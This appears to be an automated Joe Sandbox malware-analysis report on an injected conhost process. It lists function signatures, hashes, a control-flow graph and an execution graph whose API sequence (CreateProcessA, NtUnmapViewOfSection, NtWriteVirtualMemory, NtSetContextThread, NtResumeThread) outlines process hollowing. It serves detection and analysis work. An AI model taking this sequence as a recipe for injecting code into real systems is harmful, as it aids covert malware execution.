                                                                                                    • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                                    • Instruction Fuzzy Hash: 41115B61214F5086E7509B56ECD8319A6A0F788BEBF844374EA9987B94EB78C9048B48

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 581 2505e595c10-2505e595c37 582 2505e595c39-2505e595c48 581->582 583 2505e595c4b-2505e595c56 GetCurrentThreadId 581->583 582->583 584 2505e595c58-2505e595c5d 583->584 585 2505e595c62-2505e595c69 583->585 586 2505e59608f-2505e5960a6 call 2505e597a20 584->586 587 2505e595c7b-2505e595c8f 585->587 588 2505e595c6b-2505e595c76 call 2505e595a40 585->588 590 2505e595c9e-2505e595ca4 587->590 588->586 593 2505e595caa-2505e595cb3 590->593 594 2505e595d75-2505e595d96 590->594 597 2505e595cfa-2505e595d6d call 2505e5945f0 call 2505e594590 call 2505e594550 593->597 598 2505e595cb5-2505e595cf8 call 2505e5986a0 593->598 599 2505e595d9c-2505e595dbc GetThreadContext 594->599 600 2505e595eff-2505e595f10 call 2505e59759f 594->600 611 2505e595d70 597->611 598->611 604 2505e595efa 599->604 605 2505e595dc2-2505e595de3 599->605 614 2505e595f15-2505e595f1b 600->614 604->600 605->604 615 2505e595de9-2505e595df2 605->615 611->590 617 2505e595fde-2505e595fee 614->617 618 2505e595f21-2505e595f78 VirtualProtect FlushInstructionCache 614->618 619 2505e595e72-2505e595e83 615->619 620 2505e595df4-2505e595e05 615->620 621 2505e595ffe-2505e59600a call 2505e594ed0 617->621 622 2505e595ff0-2505e595ff7 617->622 624 2505e595fa9-2505e595fd9 call 2505e59798c 618->624 625 2505e595f7a-2505e595f84 618->625 626 2505e595ef5 619->626 627 2505e595e85-2505e595ea3 619->627 628 2505e595e6d 620->628 629 2505e595e07-2505e595e1c 620->629 643 2505e59600f-2505e596015 621->643 622->621 630 2505e595ff9 call 2505e5944c0 622->630 624->614 625->624 632 2505e595f86-2505e595fa1 call 2505e594470 625->632 627->626 634 2505e595ea5-2505e595eec call 2505e5939e0 627->634 628->626 629->628 635 2505e595e1e-2505e595e68 call 2505e593a50 SetThreadContext 629->635 630->621 632->624 634->626 646 2505e595ef0 call 2505e5975bd 634->646 635->628 647 2505e596057-2505e596075 643->647 648 2505e596017-2505e596055 ResumeThread call 2505e59798c 643->648 646->626 650 2505e596089 647->650 651 2505e596077-2505e596086 647->651 648->643 650->586 651->650
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread$Current$Context
                                                                                                    • String ID:
                                                                                                    • API String ID: 1666949209-0
                                                                                                    • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                                    • Instruction ID: e7b0326d7d622f23563650b2b79d375bf1f9d50c08da1ac521b57ade460357b3
                                                                                                    • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                                    • Instruction Fuzzy Hash: 33D1AE76208F88C2DA709B15E8D439A77A0F388B89F540256EACD87BA5DF3DC551CF14
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID: dialer
• API String ID: 756756679-3528709123
• Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
• Instruction ID: 0c139b90974bd49409bcc376287ce2d3485afe3144aa330ed99a948bf4698402
• Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
• Instruction Fuzzy Hash: 2B31A221701F51C2EB158F56ADC83A967A0FB44B86F884170DFC887B66FB38C4A1CB08

APIs
Memory Dump Source
• Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
Similarity
• API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
• String ID:
• API String ID: 517849248-0
• Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
• Instruction ID: c2c86ba0894afac8225ed328cbd66688ff4d6b62a51ea17d493ccefcc6543374
• Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
• Instruction Fuzzy Hash: 65015B21300F4196EA10DB12ACD835D63A1F788FC6F888175CE8A87B54EE38C985CB44

APIs
Memory Dump Source
• Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
• String ID:
• API String ID: 449555515-0
• Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
• Instruction ID: a62bcc4994c478b59c4898fe1ffe9ac0c3b4cd6dee26d105c4212ae722d4ee53
• Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
• Instruction Fuzzy Hash: B8111B65612F40C6EB249B21ECDD75A66A0BB49F87F8406B4CB8947B65FF3CC448CB08

APIs
Strings
Memory Dump Source
• Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm$f
• API String ID: 2395640692-629598281
• Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
• Instruction ID: 64f3afeaf52b1f802eab2e58b3703433e50d0af451ad10fd696eeb2ac45527d3
• Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
• Instruction Fuzzy Hash: F4519132712A00CAEF14DB15ECCCB993795F344B9AF918160DA968778AFB35D841CF08

APIs
Strings
Memory Dump Source
• Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm$f
• API String ID: 2395640692-629598281
• Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
• Instruction ID: f28b821d02ddfd9dddc13a146462b830b973b160ddacb02e053f8ccbf02792d6
• Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
• Instruction Fuzzy Hash: B131C032211B40D6EB14DF15ECCC79937A5F744B8AF858164EE8A87B86EB39C940CF08

APIs
Strings
Memory Dump Source
• Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
Similarity
• API ID: FinalHandleNamePathlstrlen
• String ID: \\?\
• API String ID: 2719912262-4282027825
• Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
• Instruction ID: 6cd07cebd1b6af4c78a40fcf14d21910c525816d05a8db276b4f9a068e4656e0
• Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
• Instruction Fuzzy Hash: 68F04F22304A41D2EB608B21FDD839D6762F754B8AFC481B1CAC98B955FE7CC688CF04

APIs
Strings
Memory Dump Source
• Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
Similarity
• API ID: CombinePath
• String ID: \\.\pipe\
• API String ID: 3422762182-91387939
• Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
• Instruction ID: a9cdc26376ed5a49371cb523a8ea8404f6216000fbebbf99cddfec1369992df0
• Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
• Instruction Fuzzy Hash: BFF05410304F80D1EA004B13BDC82595651BB48FD6F845271DFD647F19EE38C4458B08

APIs
Strings
Memory Dump Source
• Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
• Instruction ID: d33ba17f7c202e294a495d83ad5e1bca6dc092f6459289417f1923e6c260a412
• Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
• Instruction Fuzzy Hash: 74F08261711E4092EF495B60ECCC3692360FB48B87F882569D68B85562FF3CC488CF18

APIs
Memory Dump Source
• Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
• Instruction ID: 5fef3eae2ee2d4daa462992a71742800898750accf5ccb6482496928d1606619
• Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
• Instruction Fuzzy Hash: 8D02C732219B80C6EBA08B55F8D439AB7A0F3C5785F504155EACE87BA9EB7CC494CF14

APIs
Memory Dump Source
• Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
Similarity
• API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
• String ID:
• API String ID: 2210144848-0
• Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
• Instruction ID: 8d36156a80f32a8e7630829be21a77808ce2f2e688cadd1d49fab56b49a3b8ae
• Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
• Instruction Fuzzy Hash: DA81A122620E1589FB509F659CD83AD67A1F744B8BFC443B6DE8A937D2FB348441CB18

APIs
Memory Dump Source
• Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
• Instruction ID: 7a02a7a9a30954f5a9f76d53ec68aea0e9089bdbd6db6d149bd5a823c3197ffd
• Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
• Instruction Fuzzy Hash: 4A61D872519E44C6E7609B15FCC835AB7A0F388746F900266EACD87BA9EB7CC550CF18

APIs
Memory Dump Source
• Source File: 00000027.00000002.2398224271.000002505E560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002505E560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2505e560000_conhost.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
• Instruction ID: 9ce4fbaea3fa87a292180b421068fadc6c1a817d92d1686f69c896ce7e598546
• Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
• Instruction Fuzzy Hash: BF117322A54F0101F6A41169EFDE3692151FB543F6FD846A4EEF706BD6AA388C61490C

APIs
Memory Dump Source
• Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
• Instruction ID: ba42963b27bc9b241ce42ce2ae65babb75dae052af32885b9ad4ec7ffdb1ece7
• Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
• Instruction Fuzzy Hash: 2A11C6A6A54F8001FA981164EEDE36511407B64377FC807F4BBF6073D6BB348C81492C

APIs
Memory Dump Source
• Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModule
• String ID:
• API String ID: 1092925422-0
• Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
• Instruction ID: 597509de488902e0dd0cf98e051c724a16045d1c2c97cec4fbf42e6dc611dd65
• Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
• Instruction Fuzzy Hash: 8A112A2A705F40C2EB149B11FC883AAA6A4F749B86F840179DFC947B95FE3DC505CB08

APIs
Strings
Memory Dump Source
• Source File: 00000027.00000002.2398224271.000002505E560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002505E560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2505e560000_conhost.jbxd
Similarity
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: csm$f
• API String ID: 3242871069-629598281
• Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
• Instruction ID: 0783cfe523f346f34b551868f2375fbce282e966e711019548aacd285b2afed0
• Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
• Instruction Fuzzy Hash: 3051AE72612A408AEB14CF25ECC8B193395F364B9AFD581E4DA9647788FB74C881CF08

APIs
Strings
Memory Dump Source
• Source File: 00000027.00000002.2398224271.000002505E560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002505E560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2505e560000_conhost.jbxd
Similarity
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: csm$f
• API String ID: 3242871069-629598281
• Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
• Instruction ID: 87c6182f40bd988b716c09583eb5e09b499adf5023caaa6e4dce12c4b00c6d23
• Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
• Instruction Fuzzy Hash: CC318D76211A4096E714DF11ECC871937A4F754BDAFD58094AEDA07785EB38C941CF0C

APIs
Memory Dump Source
• Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
Similarity
• API ID: Heap$Process$Free
• String ID:
• API String ID: 3168794593-0
• Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
• Instruction ID: a9ea8ad55b1df28a82c511e380e7a5d9db68225ff9242854fbee235eaa4568ec
• Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
• Instruction Fuzzy Hash: EB116732514F98D2E750CF66ACC821EB7A0F789B8AF444269DB8A03B15EF38C011CB08

APIs
Strings
Memory Dump Source
• Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
• Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
• Instruction ID: 01c45d686f8aa54dfb1f84fa8c5fb40e7095e24cfa45e893376f61836752e0f7
• Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                                    • Instruction Fuzzy Hash: 9771D236204F81C5EB249F65ADD83EA6790F745B86FC410A6DEC983B8AEE38C544CB44
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileType
                                                                                                    • String ID: \\.\pipe\
                                                                                                    • API String ID: 3081899298-91387939
                                                                                                    • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                                    • Instruction ID: e5258a68bd502a6a3f5f7e5d935fe415c89fa8dc7fa37deaa6c1d4fb276eedd4
                                                                                                    • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                                    • Instruction Fuzzy Hash: 0F51B526204B81C1EA74DE25EDDC3EA6651F385781FC51065CACA83F9BEE35C405CF48
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                    • String ID: U
                                                                                                    • API String ID: 442123175-4171548499
                                                                                                    • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                                    • Instruction ID: 60cdc91ca39c6d1723ff96f646054588680b86657e4b90e8592e8f6f90ed2cce
                                                                                                    • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                                    • Instruction Fuzzy Hash: F8418472624A4081EB60DF25ECD83A9A7A0F798796F804135EE8D87754EB3CC541CB44
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Stringtry_get_function
                                                                                                    • String ID: LCMapStringEx
                                                                                                    • API String ID: 2588686239-3893581201
                                                                                                    • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                                                    • Instruction ID: 5e58646f76b550be6f7173e7efbffb222b661bff41cf0bbd5efa8cfe64b4734f
                                                                                                    • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                                                    • Instruction Fuzzy Hash: 5A113676208B8086DB60CB56BCC439AB7A0F7C8B81F944126EECD83B19EF38C440CB04
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFileHeaderRaise
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 2573137834-1018135373
                                                                                                    • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                                    • Instruction ID: 86ec77be2c0063eee55ca52d2e4d2171f1c249b14af68de65e9088c1b53130f6
                                                                                                    • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                                    • Instruction Fuzzy Hash: C9114C32208F8082EB618F15EC8439A77A5FB88B99F584265DFCD07B69EF38C551CB04
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                    • String ID: InitializeCriticalSectionEx
                                                                                                    • API String ID: 539475747-3084827643
                                                                                                    • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                                    • Instruction ID: cfa7f9b2264384993deef93c8760a8853c5ee5152f176301a73d3297ad226a88
                                                                                                    • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                                    • Instruction Fuzzy Hash: 22F0B461310F8082E6055B81FCC83982321BB88B83F9441A5EA8903B15EE38C454CF08
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398224271.000002505E560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002505E560000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e560000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: try_get_function
                                                                                                    • String ID: November$October
                                                                                                    • API String ID: 2742660187-1636048786
                                                                                                    • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                                                    • Instruction ID: 03d159e3bfbe5a47d93d35aca1fdab1981095d4f3014058bad0b2d5b33f70d02
                                                                                                    • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                                                    • Instruction Fuzzy Hash: 6EE09B51201D4192EF05A755FCC83D42311F754781FD95061D59506651EE3CC896CB4C
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Valuetry_get_function
                                                                                                    • String ID: FlsSetValue
                                                                                                    • API String ID: 738293619-3750699315
                                                                                                    • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                                    • Instruction ID: e13ac5007c78b888bdf94f9fcce412ff5d672ef5b05e898fc732474486133e68
                                                                                                    • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                                    • Instruction Fuzzy Hash: 8CE065A1200E40D2EA054BA0FCC87E86322BB88787FC852B6D58906655EE38C855CF18
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$AllocFree
                                                                                                    • String ID:
                                                                                                    • API String ID: 756756679-0
                                                                                                    • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                                    • Instruction ID: 99abaed175304ab7501e5f1ec329b9ff0bed989b9bba58b9af4666be69fc8be0
                                                                                                    • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                                    • Instruction Fuzzy Hash: B3217122604F90C1EA118F69ED8839AF7A0FB84B96F854120DECC87B15FF78C542CB04
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$AllocProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 1617791916-0
                                                                                                    • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                                    • Instruction ID: da58d1bcf5f5922f6c24df9051614c299bda72a54daf67e27f58a527d3314a48
                                                                                                    • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                                    • Instruction Fuzzy Hash: B3E03971611A00C6E7048B62DC883497AE1FB88B07F888134CA8907750EF7D8499CB40

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:10.8%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:83
                                                                                                    Total number of Limit Nodes:5
                                                                                                    execution_graph (entry function: API calls reached, in order; helper functions and return blocks in parentheses)
                                                                                                    • 7ffd9bab06c8: NtResumeThread (at 7ffd9bab06cd) → 7ffd9bab0784
                                                                                                    • 7ffd9baae1e8: K32GetModuleInformation (at 7ffd9baae1f1) → 7ffd9baae2b2
                                                                                                    • 7ffd9baae7b6: MapViewOfFile (at 7ffd9baae7c5) → 7ffd9baae8a3
                                                                                                    • 7ffd9baae2ec: CreateFileA (at 7ffd9baae2f5) → 7ffd9baae4a2
                                                                                                    • 7ffd9baadb69: 7ffd9baadb79 → helper 7ffd9baaca10 (two K32GetModuleInformation calls via 7ffd9baacbe0 and 7ffd9baacbf0), called again from 7ffd9baadbd8; 7ffd9baadbf6 → helper 7ffd9baaca90 and 7ffd9baadc01 → helper 7ffd9baaca98 (both reach CreateFileA at 7ffd9baae419 through 7ffd9baaca41, returning via 7ffd9baae4a2 or 7ffd9baacab7); 7ffd9baadc19 → helper 7ffd9baacbe0 (K32GetModuleInformation at 7ffd9baae26c, then 7ffd9baacbf0 → K32GetModuleInformation at 7ffd9baacbf9 → 7ffd9baae2b2) → 7ffd9baadd6d
                                                                                                    • 7ffd9bab04ed: NtWriteVirtualMemory (at 7ffd9bab04fb) → NtSetContextThread (at 7ffd9bab05c7) → 7ffd9bab069a
                                                                                                    • 7ffd9bab02ce: NtUnmapViewOfSection (at 7ffd9bab02dd) → 7ffd9bab039a
                                                                                                    • 7ffd9baae54e: CreateFileMappingW (at 7ffd9baae55d) → 7ffd9baae709
                                                                                                    • 7ffd9baaec6e: helper 7ffd9baaca78 → 7ffd9baaca41 → CreateFileA (at 7ffd9baae419) → 7ffd9baaec89 (via 7ffd9baae4a2 or 7ffd9baacab7)
                                                                                                    • 7ffd9baafeb1: CreateProcessA (at 7ffd9baafebf) → 7ffd9bab01e0
                                                                                                    • 7ffd9baafa62: 7ffd9baaf4bd → helper 7ffd9baaf070 (CreateProcessA at 7ffd9baaf079 → 7ffd9bab01e0); 7ffd9baaf57e → CreateProcessA (7ffd9baaf070); 7ffd9baaf5cd → CreateProcessA (7ffd9baaf080); 7ffd9baaf607 → NtSetContextThread (7ffd9baaf0c0), repeated from 7ffd9baaf777 (loop) and 7ffd9baaf86d; 7ffd9baaf8ce → NtResumeThread (7ffd9baaf0e0) → 7ffd9baaf8fa
